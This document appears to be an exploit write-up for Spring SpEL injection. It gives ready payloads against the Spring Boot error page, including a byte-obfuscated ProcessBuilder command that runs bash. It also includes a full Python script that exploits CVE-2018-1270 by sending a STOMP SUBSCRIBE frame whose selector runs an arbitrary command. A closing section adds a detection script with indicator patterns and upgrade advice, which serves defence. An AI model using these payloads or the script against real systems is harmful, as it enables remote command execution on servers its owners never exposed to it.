Vulnerability: http://www.wooyun.org/bugs/wooyun-2016-0226888
Affected versions: Spring Boot 1.1, 1.2, 1.3.0
Usage:
Replace the parameter with the following.

Spring SpEL expression PoC:
```
${new%20java.lang.String(new%20byte[]{70, 66, 66, 50, 48, 52, 65, 52, 48, 54, 49, 70, 70, 66, 68, 52, 49, 50, 56, 52, 65, 56, 52, 67, 50, 53, 56, 67, 49, 66, 70, 66})}
```
Result:
```
FBB204A4061FFBD41284A84C258C1BFB
```
The returned value is md5(wooyun).

Spring SpEL expression EXP:
```
${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}
```
Executes the command directly and returns its output.

The arbitrary code execution EXP above sometimes gives no echoed output; below is a somewhat more complex one:
```
${new java.io.BufferedReader( new java.io.InputStreamReader(new java.lang.ProcessBuilder(new String[]{new java.lang.String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}),new java.lang.String(new byte[]{45,99}),new java.lang.String(new byte[]{108, 115, 32, 45, 97, 108, 32, 124, 32, 116, 114, 32, 39, 10, 39, 32, 39, 32, 39})}).start().getInputStream())).readLine()}.
```
It runs the ls command and returns the output joined on a single line, separated by spaces. Note the trailing . at the end.
## EXP
spring_message_rce.py
```python
# -*- coding:utf-8 -*-
# Author: CF_HB
# Date: 2019-04-27
# Successfully tested on OSX (10.14.2)
# References:
# https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1270
# https://github.com/CaledoniaProject/CVE-2018-1270
# usage:
# python3.6 spring_message_rce.py "/Applications/Calculator.app/Contents/MacOS/Calculator"
# requires the websocket-client package (pip install websocket-client)
import logging
import websocket
import sys

if len(sys.argv) < 2:
    sys.exit("usage: %s <command>" % sys.argv[0])

logging.basicConfig(stream=sys.stdout, level=logging.INFO)
ws = websocket.WebSocket()
# ws.connect("ws://192.168.2.128:8080/hello", http_proxy_host="127.0.0.1", http_proxy_port=8000)
ws.connect("ws://192.168.2.128:8080/hello")
logging.info("Sending 'Hello, World'...")
# STOMP CONNECT frame: command, headers, blank line, NUL terminator
txt1 = '''CONNECT
accept-version:1.1,1.0
heart-beat:10000,10000\n\n\x00'''
ws.send(txt1)
logging.info("Sent txt1")
logging.info("Receiving...")
result = ws.recv()
logging.info("Received '%s'" % result)
# STOMP SUBSCRIBE frame; the vulnerable server evaluates the selector header as SpEL
txt2 = '''SUBSCRIBE
selector:T(java.lang.Runtime).getRuntime().exec('%s')
id:sub-0
destination:/topic/greetings\n\n\x00''' % (sys.argv[1])
ws.send(txt2)
logging.info("Sent txt2")
logging.info("Receiving...")
ws.close()
logging.info("Exploit successful.....")
```
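The following is an added defensive example, not code from the original post or from the referenced repositories. It covers both payload shapes on this page: it flags the `${...}` SpEL expressions from the first section when they appear in HTTP access-log request targets, and it parses STOMP frames like the ones the script above sends and flags a SUBSCRIBE `selector` header that carries SpEL type or static references. The log format (common log format), the sample log lines, the sample frames and the indicator pattern list are all constructed assumptions for this example; the patterns are heuristics derived from the payloads shown here, not a complete SpEL detector.

```python
"""Added defensive example, not part of the original post: flag the SpEL
injection shapes shown on this page in two places where a defender sees
them, namely HTTP access-log request targets (the ${...} payloads against
the Spring Boot error page) and STOMP SUBSCRIBE frames whose `selector`
header was evaluated as SpEL (CVE-2018-1270). All sample log lines and
frames below are constructed for this example."""
import re
from urllib.parse import unquote

# Indicator patterns, each derived from a payload shape on this page (heuristic list).
SPEL_PATTERNS = [
    ("expression-wrapper", re.compile(r"\$\{")),                       # ${...}
    ("type-reference", re.compile(r"\bT\(\s*[\w.]+\s*\)")),            # T(java.lang.Runtime)
    ("static-reference", re.compile(r"@[\w.]+@\w+\s*\(")),             # @pkg.Class@method(
    ("java-constructor", re.compile(r"\bnew\s+java\.[\w.]+\s*\(")),    # new java.lang.String(
    ("byte-array-literal", re.compile(r"\bnew\s+byte\s*\[\]\s*\{")),   # new byte[]{...} hides strings
    ("process-exec", re.compile(r"\b(Runtime|ProcessBuilder|getRuntime|exec)\b")),
]


def spel_indicators(text):
    """Return the indicator names that match `text` after URL-decoding it."""
    decoded = unquote(text)
    return [name for name, pattern in SPEL_PATTERNS if pattern.search(decoded)]


# Request target inside a common-log-format line: "GET /path?query HTTP/1.1" (assumed format)
LOG_REQUEST = re.compile(r'"(?:GET|POST|PUT|DELETE|PATCH|HEAD)\s+(\S+)\s+HTTP/')


def scan_access_log(lines):
    """Return (line_number, request_target, indicators) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LOG_REQUEST.search(line)
        if match is None:
            continue
        found = spel_indicators(match.group(1))
        if found:
            hits.append((number, match.group(1), found))
    return hits


def parse_stomp_frame(raw):
    """Split a STOMP frame into (command, headers, body); the body is NUL-terminated."""
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            headers[key.strip()] = value.strip()
    return lines[0].strip(), headers, body.rstrip("\x00")


def inspect_stomp_frame(raw):
    """Return indicators found in the selector header of a SUBSCRIBE frame (empty if clean)."""
    command, headers, _ = parse_stomp_frame(raw)
    if command != "SUBSCRIBE" or "selector" not in headers:
        return []
    return spel_indicators(headers["selector"])


# Constructed sample input: one benign request and one carrying the page's ${...} PoC shape.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [27/Apr/2019:10:00:01 +0000] "GET /app?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [27/Apr/2019:10:00:02 +0000] "GET /app?name=${new%20java.lang.String(new%20byte[]{70,66})} HTTP/1.1" 500 1024',
]

# Constructed sample frames: an ordinary selector and the selector shape from the page's script.
BENIGN_SUBSCRIBE = "SUBSCRIBE\nselector:headers.type == 'greeting'\nid:sub-0\ndestination:/topic/greetings\n\n\x00"
MALICIOUS_SUBSCRIBE = ("SUBSCRIBE\nselector:T(java.lang.Runtime).getRuntime().exec('ipconfig')\n"
                       "id:sub-0\ndestination:/topic/greetings\n\n\x00")

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("access log line %d: %s -> %s" % hit)
    for label, frame in (("benign", BENIGN_SUBSCRIBE), ("malicious", MALICIOUS_SUBSCRIBE)):
        print("%s frame: %s" % (label, inspect_stomp_frame(frame) or "clean"))
```

Run it as a script to see the constructed samples classified, or import `scan_access_log` and `inspect_stomp_frame` and feed them real log lines or captured WebSocket payloads. The URL-decoding step matters because the first PoC on this page arrives with `%20` in place of spaces, so a pattern written for `new java.lang.String(` would otherwise miss it. Detection only finds attempts after the fact; the remediation for both issues is upgrading to a Spring Boot / Spring Framework release in which the error page no longer evaluates user input as SpEL and the STOMP selector is evaluated in a restricted evaluation context.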